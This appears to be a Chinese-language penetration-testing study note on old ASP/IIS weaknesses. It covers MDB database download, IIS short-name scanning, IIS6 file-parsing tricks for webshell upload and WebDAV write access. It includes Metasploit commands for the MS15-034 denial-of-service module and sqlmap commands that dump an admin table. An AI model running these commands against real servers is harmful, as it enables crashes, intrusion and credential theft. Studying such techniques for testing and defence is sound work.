asp在当下其实存在的漏洞已经很少了。所以不算是重点,但可以作为了解。
-
asp-默认安装-MDB数据库泄露下载
因为asp的数据库和现在的数据有所不同,mdb是一种文件的形式直接放在网站中,只要能扫描到mdb,就可以直接下载,最后直接打开就行了。
但前提是需要知道access数据库的名字。解决的办法:1、直接爆破。2、查看公开的源码,如果access数据库名字没有更改,就可以直接下载。3、短文件盲猜。
解决办法:直接更改access数据库名字。
-
asp中间件-cve、短文件、解析、写权限
1、asp中间件-cve。这不是一个拿权限的方法,而是直接蓝屏,也称蓝屏漏洞。一般不要使用。用kali进行攻击
漏洞复现
msfconsole
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts xx.xx.xx.xx
set rport xx
run
2、IIS短文件
利用工具可以找到文件夹和文件的前六位。可以利用字典结合工具一起跑。
利用工具:
https://github.com/irsdl/IIS-ShortName-Scanner
https://github.com/lijiejie/IIS_shortname_Scanner
3、文件解析
一般存在iis6中
1、该版本默认会将*.asp;.jpg此种格式的文件名,当成asp解析
2、该版本默认会将*.asp/目录下所有的文件当成asp解析
如:logo.asp;.jpg xx.asp/logo.jpg
IIS 7.x 解析漏洞(不重要)
在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件
应用场景:配合文件上传获取Webshell
-IIS写权限(前提是开启webdav)
IIS<=6.0 目录权限开启写入,开启WebDAV,设置为允许
参考利用:https://cloud.tencent.com/developer/article/2050105
-
asp-sql注入-sqlmap使用、access注入
sql注入:与数据交互的地方都可以存在sql注入。
报错:当页面与正常页面不同,有时候存在容错页面404,这里不是报错文件,这里是代码逻辑设置错误。
能用工具就直接工具跑,手工是为了绕waf
sqlmap: automatic SQL injection and database takeover toolhttps://sqlmap.org/
python sqlmap.py -u "xxx" --tables #获取表
python sqlmap.py -u "xxx" --cloumns -T admin #获取列
python sqlmap.py -u "xxx" --dump -C "" -T admin #获取值